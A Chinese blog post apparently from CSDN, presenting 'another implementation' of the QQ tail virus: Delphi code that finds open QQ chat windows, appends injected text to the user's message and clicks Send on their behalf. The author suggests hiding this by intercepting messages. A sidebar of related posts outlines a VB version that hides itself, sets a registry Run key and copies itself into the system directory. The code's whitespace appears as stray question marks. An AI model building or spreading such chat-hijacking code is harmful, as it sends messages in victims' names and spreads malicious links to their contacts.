QQ尾巴病毒的另一种实现

最新推荐文章于 2021-02-01 19:34:58 发布
最新推荐文章于 2021-02-01 19:34:58 发布
阅读量1.4k 收藏
点赞数
分类专栏: 其他 文章标签: qq integer button 聊天 timer 框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/myling/article/details/17877
版权

前几天看到?wuqiu 兄 把 QQ尾巴病毒模拟了一遍,

我觉得通过查找窗体标题,不太合常理

回去用SPY++来查看了一下,原来,QQ的框架是这样的

无法显示

?

其中,#32770(对话框)就是弹出的QQ聊天界面;内部的控件就如上图显示的那样,有Static(标签)、Button(按钮)、AfxWnd42(这个我猜类似panel的容器)、RICHEDIT(这里面就是显示我们的聊天纪录了)

具体的布局就不一一的细说了,你们可以自己打开SPY++看看,一目了然

其中,我们用到的只是其中两个控件,如下图:

前半部分是句柄,中间是标题,后半部分是类名

如:05240258~发送(&S)~Button

就是发送按钮,句柄是05240258

好了,知道了这些,想做点什么就很简单了

全部代码如下:

?

Procedure TForm1.Timer1Timer(Sender: TObject);
Var
?? hMemo, hRichEdit, HWindow, HButton: THandle; //句柄变量
?? szText?????????? : Array[0..255] Of char;?? //得到的字符串
?? MyText?????????? : String;? //发送的字符串
Begin
?? HWindow := 0;//从零开始,即从第一个字窗体开始遍历查找

?? While true Do
????? Begin

???????? //找是#32770(对话框)的窗体
???????? HWindow := FindWindowEx(0, HWindow, '#32770', Nil);
???????? If HWindow <> 0 Then
??????????? Begin

????????????? //找是AfxWnd42(这个我猜类似panel的容器)的窗体
?????????????? hMemo := FindWindowEx(HWindow, 0, 'AfxWnd42', Nil);
?????????????? If hMemo <> 0 Then
????????????????? Begin

???????????????? ???//找是RICHEDIT的窗体
???????????????????? hRichEdit := FindWindowEx(hMemo, 0, 'RichEdit', Nil);
???????????????????? If hRichEdit <> 0 Then
??????????????????????? Begin

???????????????????????? //想些什么随便啦,嘿嘿
?????????????????????????? MyText := '?????????? 阿德是个大帅哥,嘿嘿';

????????????????????????? //发消息,得到QQ中的文本
?????????????????????????? SendMessage(hRichEdit, WM_GetTEXT, 256,
????????????????????????????? integer(@szText[0]));

??????????????????????????//加上自己的话
?????????????????????????? MyText := szText + MyText;

????????????????????????? //再发给QQ
?????????????????????????? SendMessage(hRichEdit, WM_SETTEXT, 256,
????????????????????????????? integer(MyText));

????????????????????????? //找到发送按钮
?????????????????????????? HButton := FindWindowEx(HWindow, 0, 'Button',
????????????????????????????? '发送(&S)');

????????????????????????? //发点击消息,发送
?????????????????????????? SendMessage(HButton, BM_CLICK, 0, 0);

????????????????????????? //退出,如果去掉这句,就是给所有打开的QQ窗体发

????????????????????????? //否则,只发给最前面的QQ窗体
?????????????????????????? break;
??????????????????????? End;
????????????????? End;
??????????? End;
????? End;
End;

?

这也只是对QQ尾巴的一种猜测,程序有很多不尽如人意的地方,比如发的文本在QQ中显示一下然后再发送,就如?wuqiu 兄 的文章里说的,只要对消息进行拦截,然后再背地里偷偷的发送,就会神不知鬼不觉了

?

myling
关注
专栏目录
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
[系统安全] 七.逆向分析之PE病毒原理、C++实现文件加解密及OllyDbg逆向
杨秀璋的专栏
12-26 6163
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了条件语句和循环语句源码还原及流程控制逆向。这篇文章将分享勒索病毒,通过编写程序实现获取Windows系统目录文件,并对其进行加密和解密的过程;第二部分详细讲解了OllyDbg和在线沙箱的逆向分析过程。希望对入门的同学有帮助。
QQ尾巴病毒仿真(转)
独立寒秋的库房
10-29 1118
  自2003起,QQ尾巴病毒可以算是风光了一阵子。它利用IE的邮件头漏洞在QQ上疯狂传播。中毒者在给别人发信息时,病毒会自动在信息文本的后边添上一句话,话的内容多种多样,总之就是希望信息的接收者点击这句话中的URL,成为下一个中毒者。  下面我将要讨论的,就是QQ尾巴病毒使用的这一技术。由于病毒的源代码无法获得,所以以下的代码全是我主观臆断所得,所幸的是效果基本与病毒本身一致。   粘贴尾巴  
QQ尾巴病毒”核心技术的实现
马说@CSDN
02-09 2323
  声明:本文旨在探讨技术,请读者不要使用文章中的方法进行任何破坏。  2003这一年里,QQ尾巴病毒可以算是风光了一阵子。它利用IE的邮件头漏洞在QQ上疯狂传播。中毒者在给别人发信息时,病毒会自动在信息文本的后边添上一句话,话的内容多种多样,总之就是希望信息的接收者点击这句话中的URL,成为下一个中毒者。下图就是染毒后的QQ发送的消息,其中中毒者只打了“你好”两个字,其它的就全是病毒的杰作了。 
QQ尾巴病毒
Terry的专栏
01-23 1057
我在网上搜索相应的解决方法,终于找到了,方法如下:1、打开任务管理器进程(按ctrl+shift+esc),结束gedit.exe进程和msscript.exe进程. 2、用查找删除以下文件:c:/windows/system32/gedit.exe和c:/windows/system32/msscript.exe3、打开注册表编辑器(注:方法是开始 运行 输入regedit 回车),找到:
QQ尾巴病毒 VC
magicyang87的专栏
01-28 1033
前一段时间在病毒源代码的博客上看到了QQ尾巴病毒的原理,他的博客确实不错,有很多这方面的东西。不过他是用VB或者DELPHI写的(区分不清,呵呵),而且感觉他写得有点乱,可能我习惯看C格式的代码吧。最近我用VC重写了一下,增加了一点设置功能,一些地方又加了些注释,会比较容易看懂。 首先新建一个WIN32 CONSOLE的工程,主文件代码如下: #include "stdafx.h" #i
Automate Tdxw
weixin_30892889的博客
01-20 770
Automate trade module in Tdxw Code # coding: utf-8 """ Created on Thu Dec 07 10:57:45 2017 @author: duanqs """ #import pywinauto from pywinauto import application, findwindows, findbestmatch from...
QQ尾巴源码
07-16
进程注入是另一种关键的技术,它指的是一个进程将代码注入到另一个进程中执行。QQ尾巴可能通过创建远程线程或者使用CreateRemoteThread函数,在QQ进程中注入自己的代码,使得程序可以在不被用户察觉的情况下运行并...
[系统安全] 十七.Windows PE病毒概念、分类及感染方式详解
杨秀璋的专栏
02-01 9981
作者前文介绍了PE文件格式,熟悉各种PE编辑查看工具,针对目标EXE程序新增对话框等;这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这些基础性知识不仅和系统安全相关,同样与我们身边的APP、常用软件及操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了《软件安全》视频、安全网站和参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。
计算机病毒的种类及预防措施.doc
最新发布
05-06
- **示例**:QQ消息尾巴木马(Trojan.QQ3344)是一种常见的木马病毒,它会通过即时通讯软件传播。 4. **脚本病毒** - **前缀**:Script。 - **特点**:使用脚本语言编写,可以通过网页传播,常见的前缀还包括VBS...
C#写的QQ自动发消息.rar
09-28
作者: 三角猫 出处: http://www.zu14.cn/ 版权归 三角猫 和 真有意思网 所有,转载请注明出处 using System; using System.Collections.Generic; using System.Text; namespace QQAutoMsg { /// /// 消息发送 /// internal static class QQMsgSender { /// /// 发送消息 /// /// 所以已打开的QQ窗体的列表 /// 消息内容 internal static void Go(List qqChatWindows, string msg) { foreach (EnumQQChatWindows.QQChatWindow win in qqChatWindows) { SendMsg(win.WindowHwnd, msg); } } /// /// 根据窗体句柄,找到输入框和发送按钮,发送消息出去 /// /// 聊天窗口句柄 /// 消息内容 private static void SendMsg(IntPtr hWnd, string msg) { if (NativeMethods.IsWindow(hWnd)) //确认该聊天窗口仍然有效 { ////找到 发送 按钮 IntPtr hwndButton = NativeMethods.FindWindowEx(hWnd, IntPtr.Zero, "Button", "发送(S)"); if (IntPtr.Zero != hwndButton) { ////找到窗体顺序上的第一个RichEdit20A控件,其实就是消息显示框 IntPtr hwndRichEdit = NativeMethods.FindWindowEx(hWnd, IntPtr.Zero, "RichEdit20A", null); ////利用spy++,可以看到消息输入框的父窗体是类名为 AfxWnd42 的控件 ////在顺序上是显示框的下一个窗体 if (IntPtr.Zero != hwndRichEdit) { ////找到 AfxWnd42 这个窗体 hwndRichEdit = NativeMethods.GetWindow(hwndRichEdit, NativeMethods.GW_HWNDNEXT); if (IntPtr.Zero != hwndRichEdit) { ////这才是真正的消息输入框 hwndRichEdit = NativeMethods.FindWindowEx(hwndRichEdit, IntPtr.Zero, "RichEdit20A", null); if (hwndRichEdit != IntPtr.Zero) { ////发送消息,因为QQ屏蔽了 WM_SETTEXT, WM_PASTE 命令,所有采用 EM_REPLACESEL 来实现 NativeMethods.SendMessage(hwndRichEdit, NativeMethods.EM_REPLACESEL, IntPtr.Zero, msg); ////给发送按钮发 鼠标单击消息 NativeMethods.SendMessage(hwndButton, NativeMethods.BM_CLICK, IntPtr.Zero, IntPtr.Zero); } } } } } } } }
通达信股票交易软件验证码识别源代码
09-08
VB6.0编写通达信股票交易软件验证码识别源代码,利用它可实现自动登陆交易软件,扩展自动交易系统。
VB编写QQ尾巴病毒(超简单版).txt
03-20
1.它会使自身在桌面和任务栏上隐藏; 2.在注册表的RUN项建一个子键使之能开机自动运行; 3.复制自己到系统目录下,并隐藏; 4.监视桌面前台窗口,并捕捉QQ聊天窗口;
用Python自动化,抓取到一个句柄,他的类名是这个:AfxWnd42,导致不能输入内容,应该怎办
AIlfw的博客
12-28 2106
用的是pywin32,只能获取到句柄,不能进行输入 在网上找了很久都没有答案,没有C币也不能提问,求各位大神相助啊!!!
AfxWnd42 qq2006中怎样取得发送消息窗口中的Richedit
autumn20080101的专栏
05-09 1962
qq2006中怎样取得发送消息窗口中的Richedit 检举|2006-11-10 02:20hzp997 | 分类:Windows | 浏览1695次 学习编程中想让程序可以自动在QQ的发送消息框中自动发送消息,但在QQ2006中好象发送消息框中的RICHEDIT加密了,用这样的方法的不到了,请高手看下如下代码: fLastWin := FindWindowEx(GetForegro
VC++实现QQ消息群发
啊渊的专栏
02-19 2001
<br />void QQSendMsg(CString strMsg,BOOL bCloseWindow)<br />{<br />AFX_MANAGE_STATE(AfxGetStaticModuleState( ));//切换回调用程序<br />CString str;<br />CWnd* pMainWnd = AfxGetMainWnd()->GetWindow(GW_HWNDFIRST);<br />while (pMainWnd)<br />{<br />   HWND hWnd,hNext
转载[QQ聊天机器人随想]
henbing的专栏
02-19 1311
前几日,看到杂志上有一篇关于开发QQ聊天机器人的文章。谈到了对QQ循环发送消息内容,感觉倒也很好玩,于是拿起Delphi开始了我的QQ聊天机器人之路。  首先要明白自己要做什么,大家都用过QQ,知道给别人发送消息的整个过程吧!要实现循环发送消息的功能该有以下几个条件:  1.必须是在聊天模式里进行。这样发送完一条消息后,QQ窗体还存在。  2.其次是要找到QQ文本窗体的句柄。  3.向QQ文本窗体
MFC中获得各个类的句柄的总结
chenshuixian2的专栏
01-10 1289
1) 在View中获得Doc指针:CYouSDIDoc *pDoc=GetDocument();一个视只能有一个文档。 2) 在App中获得MainFrame指针:CWinApp 中的 m_pMainWnd变量就是MainFrame的指针,也可以:CMainFrame *pMain =(CMainFrame *)AfxGetMainWnd();3) 在V
[ahk]通达信股票交易软件持仓数据获取(招商证券、中银国际、通达信官方版等测试可用)
热门推荐
liuyukuan的专栏
11-08 1万+
#Persistent DetectHiddenWindows,on ;作者:缘๑۩۞() ;获取招商证券持仓数量,需要先登录到交易软件,并浏览过一次持仓情况后才可自动获取。 Gui,Add,ListView, r20 w800,股票名称|证券数量|可卖数量|成本价|浮动盈亏|盈亏比例(`%)|最新市值|当前价|今买数量|今卖数量|证券代码|股东代码 G...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值